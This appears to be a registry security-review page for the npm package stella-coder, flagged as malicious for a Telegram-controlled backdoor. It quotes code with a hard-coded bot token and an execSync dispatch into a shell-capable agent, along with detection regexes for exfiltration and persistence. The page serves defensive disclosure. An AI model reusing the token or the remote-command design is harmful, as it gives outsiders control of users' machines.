registry  /  stella-coder  /  5.3.4

stella-coder@5.3.4

Stella Coder 5.0 — AI coding agent with Telegram bot, huge context, TDD, Git ecosystem, presentations, computer control, smart home, Office automation, and antivirus

AI Security Review

scanned 39m ago · by lpm-firewall-ai

An explicitly started Telegram bot accepts messages from locally authorized accounts and invokes the Stella CLI. The CLI exposes agent tools including unrestricted terminal-command execution.

Static reason
High-risk behavior combination matched malicious policy.; source matched previously finalized malicious package; routed for review
Trigger
User runs `/tg`, `stella-cli/tg-server.mjs`, or the included Telegram batch launcher, then an authorized Telegram account sends a message.
Impact
An account admitted through the weak local code flow can cause arbitrary system commands through the package's agent tools.
Mechanism
Telegram-controlled shell-capable AI-agent command dispatch.
Rationale
This is an explicitly activated remote-control capability rather than install-time malware, but the hard-coded external bot, weak authorization flow, and shell-capable agent dispatch create concrete unresolved remote-code-execution risk.
Evidence
package.jsonstella-cli/telegram-bot.mjsstella-cli/index.mjsstella-cli/tools.mjsstella-cli/tg-server.mjsstella-cli/tg-server.bat$HOME/.stella/telegram-auth.json
Network endpoints1
api.telegram.org/bot${BOT_TOKEN}

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-10134
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in stella-coder (npm)
Details
stella-cli/telegram-bot.mjs hardcodes a Telegram bot API token (BOT_TOKEN = "8923551485:AAFw4wG8ZwOtp5rzFsnguxhu4AH-2_ebSi0") that is controlled by the package author. When the user invokes the /tg CLI command, the package starts a Telegram bot on the installer's machine that receives messages over api.telegram.org and passes them into execSync(`node stella-cli/index.mjs -p "${text}"`), invoking a shell-capable AI agent CLI with attacker-supplied input. Because the messaging channel is bound to a token the author retains, the author observes all bot traffic — including the 4-digit admin authorization code exchanged over that same channel — and can replay it to reach the command-execution path on any installer that enables /tg. telegram-bot.mjs additionally sends os.hostname() and os.userInfo().username to the same author-controlled bot. A hardcoded PREMIUM_CODE = "10102013" acts as a universal activation key that unlocks the remote-control feature-set without payment. package.json sets "main": "stella-cli/index.mjs", whose top-level executes main() and starts the interactive CLI on require/import, extending the reach of the /tg surface beyond the bin entry. There are no install lifecycle hooks; the backdoor fires when the user runs the CLI (or a consumer imports the module) and invokes /tg.

Decision evidence

public snapshot
AI called this Suspicious at 91.0% confidence as Dangerous Capability with low false-positive risk.
Evidence for block
  • `stella-cli/telegram-bot.mjs` hard-codes a Telegram bot token and polls `api.telegram.org`.
  • Authenticated Telegram messages are passed to `execSync` running `stella-cli/index.mjs -p`.
  • `stella-cli/tools.mjs` exposes `terminal_exec` with “full system access”.
  • Telegram authorization uses a generated four-digit code without visible rate limiting.
  • `stella-cli/tg-server.bat` restarts the bot indefinitely when explicitly run.
Evidence against
  • `package.json` has no preinstall/install/postinstall lifecycle hook.
  • Telegram startup requires explicit `/tg` or user-run bot scripts.
  • Bot checks a locally stored authorized-user record before dispatching messages.
  • No source evidence sends environment variables, local files, or credentials to Telegram.
  • Archives contain matching source copies rather than an opaque executable payload.
Behavioral surface
Source
ChildProcessCryptoEnvironmentVarsFilesystemNativeBindingsNetworkShellWebSocket
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 75 file(s), 1.85 MB of source, external domains: 127.0.0.1, a1x10.github.io, accounts.google.com, api-maps.yandex.ru, api.duckduckgo.com, api.github.com, api.telegram.org, cdn.jsdelivr.net, console.cloud.google.com, discord.gg, fonts.googleapis.com, geocode-maps.yandex.ru, github.com, gitlab.com, gmail.googleapis.com, html.duckduckgo.com, oauth2.googleapis.com, ollama.com, opencode.ai, static-maps.yandex.ru, www.google.com, www.googleapis.com, www.kinopoisk.ru, www.virustotal.com, www.w3.org, www.youtube.com

Source & flagged code

18 flagged · loading source
releases/stella-antivirus/scanner.mjsView file
2import path from "node:path" L3: import { execSync } from "node:child_process" L4: import { checkFileForMalware, computeFileHash, SKIP_DIRS, QUICK_SCAN_PATHS, QUARANTINE_DIR, isExcluded } from "./database.mjs"
High
Child Process

Package source references child process execution.

releases/stella-antivirus/scanner.mjsView on unpkg · L2
336"ollama.exe", "ollama_llama_server.exe", L337: "powershell.exe", "pwsh.exe", "cmd.exe", L338: "WindowsTerminal.exe", "wt.exe",
High
Shell

Package source references shell execution.

releases/stella-antivirus/scanner.mjsView on unpkg · L336
releases/stella-antivirus/database.mjsView file
matchType = normalized_sha256 matchedPackage = stella-coder@5.2.1 matchedPath = antimalware/database.mjs matchedIdentity = npm:c3RlbGxhLWNvZGVy:5.2.1 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

releases/stella-antivirus/database.mjsView on unpkg
165{ id: "SIG-037", name: "Service install", severity: "high", category: "privesc", L166: pattern: /CreateService[\s\S]{0,100}(SERVICE_AUTO_START|SERVICE_WIN32_OWN_PROCESS)[\s\S]{0,100}(cmd|powershell|bash)/ }, L167: ... L188: { id: "SIG-044", name: "Scheduled task", severity: "high", category: "persistence", L189: pattern: /schtasks[\s\S]{0,100}(\/create|\/Create)[\s\S]{0,100}(cmd|powershell|bash|python|perl)/ }, L190: ... L207: { id: "SIG-050", name: "DNS tunneling", severity: "high", category: "backdoor", L208: pattern: /DnsQuery[\s\S]{0,100}(TXT|MX|CNAME)[\s\S]{0,100}(encode|decode|base64)[\s\S]{0,100}(socket|connect)/ }, L209: ... L240: { id: "SIG-060", name: "HTTP POST exfil", severity: "high", category: "exfil", L241: pattern: /(fetch|XMLHttpRequest|axios|http\.request|request\()[\s\S]{0,200}(POST|PUT)[\s\S]{0,200}(password|token|secret|credential|cookie)/ }, L242:
Low
Weak Crypto

Package source references weak cryptographic algorithms.

releases/stella-antivirus/database.mjsView on unpkg · L165
dist/index.mjsView file
matchType = normalized_sha256 matchedPackage = stella-coder@5.2.1 matchedPath = dist/index.mjs matchedIdentity = npm:c3RlbGxhLWNvZGVy:5.2.1 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

dist/index.mjsView on unpkg
6import os from "node:os" L7: import { execSync } from "node:child_process" L8: import { streamText, stepCountIs, generateText } from "ai" ... L22: const VERSION = "3.9.2" L23: const CONFIG_DIR = path.join(os.homedir(), ".stella") L24: const CONFIG_PATH = path.join(CONFIG_DIR, "config.json") ... L26: L27: const ZEN_BASE_URL = "https://opencode.ai/zen/v1" L28: ... L53: function loadConfig() { L54: try { return JSON.parse(fs.readFileSync(CONFIG_PATH, "utf8")) } catch { return {} } L55: }
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

dist/index.mjsView on unpkg · L6
releases/stella-coder/telegram-bot.mjsView file
4import crypto from "node:crypto" L5: import { execSync } from "node:child_process" L6: ... L11: const BOT_TOKEN = "8923551485:AAFw4wG8ZwOtp5rzFsnguxhu4AH-2_ebSi0" L12: const API_URL = `https://api.telegram.org/bot${BOT_TOKEN}` L13: const PREMIUM_CODE = "10102013" ... L15: L16: const CONFIG_DIR = path.join(os.homedir(), ".stella") L17: const BOT_CONFIG_PATH = path.join(CONFIG_DIR, "telegram-bot.json") ... L29: headers: { "Content-Type": "application/json" }, L30: body: JSON.stringify(body), L31: signal: AbortSignal.timeout(30000),
Critical
Credential Exfiltration

Source appears to send environment or credential material to an external endpoint.

releases/stella-coder/telegram-bot.mjsView on unpkg · L4
releases/stella-coder/build.mjsView file
4Cross-file remote execution chain: releases/stella-coder/build.mjs spawns releases/stella-coder/tools.mjs; helper contains network access plus dynamic code execution. L4: import path from "node:path" L5: import { execSync } from "node:child_process" L6: import { fileURLToPath } from "node:url" ... L8: const __filename = fileURLToPath(import.meta.url) L9: const __dirname = path.dirname(__filename) L10: ... L12: const SEA_BLOB = path.join(DIST, "sea-prep.blob") L13: const EXE_NAME = process.platform === "win32" ? "stella.exe" : "stella" L14: const OUTPUT = path.join(DIST, EXE_NAME)
High
Cross File Remote Execution Context

Source spawns a local helper that also contains network and dynamic execution context; review data flow before blocking.

releases/stella-coder/build.mjsView on unpkg · L4
stella-cli/telegram-bot.mjsView file
4Trigger-reachable chain: manifest.main -> stella-cli/index.mjs -> stella-cli/telegram-bot.mjs L4: import crypto from "node:crypto" L5: import { execSync } from "node:child_process" L6: ... L11: const BOT_TOKEN = "8923551485:AAFw4wG8ZwOtp5rzFsnguxhu4AH-2_ebSi0" L12: const API_URL = `https://api.telegram.org/bot${BOT_TOKEN}` L13: const PREMIUM_CODE = "10102013" ... L15: L16: const CONFIG_DIR = path.join(os.homedir(), ".stella") L17: const BOT_CONFIG_PATH = path.join(CONFIG_DIR, "telegram-bot.json") ... L29: headers: { "Content-Type": "application/json" }, L30: body: JSON.stringify(body), L31: signal: AbortSignal.timeout(30000),
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

stella-cli/telegram-bot.mjsView on unpkg · L4
releases/stella-coder/coding-brain.mjsView file
639try { L640: const output = execSync(checker.cmd, { cwd, encoding: "utf8", timeout: 120000 }) L641: return { success: true, output, hasErrors: false } ... L650: const testCmds = { L651: jest: "npx jest --passWithNoTests", L652: vitest: "npx vitest run",
High
Runtime Package Install

Package source invokes a package manager install command at runtime.

releases/stella-coder/coding-brain.mjsView on unpkg · L639
run-antivirus.batView file
path = run-antivirus.bat kind = build_helper sizeBytes = 66 magicHex = [redacted]
Medium
Ships Build Helper

Package ships non-JavaScript build or shell helper files.

run-antivirus.batView on unpkg
releases/stella-antivirus.zipView file
path = releases/stella-antivirus.zip kind = high_entropy_blob sizeBytes = 22900 magicHex = [redacted]
High
Ships High Entropy Blob

Package ships high-entropy non-source blobs.

releases/stella-antivirus.zipView on unpkg
path = releases/stella-antivirus.zip kind = compressed_blob sizeBytes = 22900 magicHex = [redacted]
Medium
Ships Compressed Blob

Package ships compressed or archive-like blobs.

releases/stella-antivirus.zipView on unpkg
path = releases/stella-antivirus.zip kind = nested_archive_needs_inspection sizeBytes = 22900 magicHex = [redacted]
Low
Nested Archive Needs Inspection

Package ships a nested archive or MCP bundle that was inventoried but not recursively analyzed.

releases/stella-antivirus.zipView on unpkg
.opencode/skills/ui-ux-pro-max/scripts/design_system.pyView file
path = .opencode/skills/ui-ux-pro-max/scripts/design_system.py kind = payload_in_excluded_dir sizeBytes = 57424 magicHex = [redacted]
High
Payload In Excluded Dir

Package hides binary, compressed, or executable-looking payloads in test/fixture/hidden paths.

.opencode/skills/ui-ux-pro-max/scripts/design_system.pyView on unpkg
antimalware/database.mjsView file
matchType = normalized_sha256 matchedPackage = stella-coder@5.2.1 matchedPath = antimalware/database.mjs matchedIdentity = npm:c3RlbGxhLWNvZGVy:5.2.1 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

antimalware/database.mjsView on unpkg
dist/antimalware/database.mjsView file
matchType = normalized_sha256 matchedPackage = stella-coder@5.2.1 matchedPath = antimalware/database.mjs matchedIdentity = npm:c3RlbGxhLWNvZGVy:5.2.1 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

dist/antimalware/database.mjsView on unpkg
dist/tools.mjsView file
matchType = normalized_sha256 matchedPackage = stella-coder@5.2.1 matchedPath = dist/tools.mjs matchedIdentity = npm:c3RlbGxhLWNvZGVy:5.2.1 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

dist/tools.mjsView on unpkg

Findings

2 Critical11 High6 Medium6 Low
CriticalCredential Exfiltrationreleases/stella-coder/telegram-bot.mjs
CriticalTrigger Reachable Dangerous Capabilitystella-cli/telegram-bot.mjs
HighChild Processreleases/stella-antivirus/scanner.mjs
HighShellreleases/stella-antivirus/scanner.mjs
HighCross File Remote Execution Contextreleases/stella-coder/build.mjs
HighRuntime Package Installreleases/stella-coder/coding-brain.mjs
HighShips High Entropy Blobreleases/stella-antivirus.zip
HighPayload In Excluded Dir.opencode/skills/ui-ux-pro-max/scripts/design_system.py
HighKnown Malware Source Similarityantimalware/database.mjs
HighKnown Malware Source Similaritydist/antimalware/database.mjs
HighKnown Malware Source Similaritydist/index.mjs
HighKnown Malware Source Similaritydist/tools.mjs
HighKnown Malware Source Similarityreleases/stella-antivirus/database.mjs
MediumNetwork
MediumEnvironment Vars
MediumInstall Persistencedist/index.mjs
MediumShips Build Helperrun-antivirus.bat
MediumShips Compressed Blobreleases/stella-antivirus.zip
MediumStructural Risk Force Deep Review
LowScripts Present
LowWeak Cryptoreleases/stella-antivirus/database.mjs
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings
LowNested Archive Needs Inspectionreleases/stella-antivirus.zip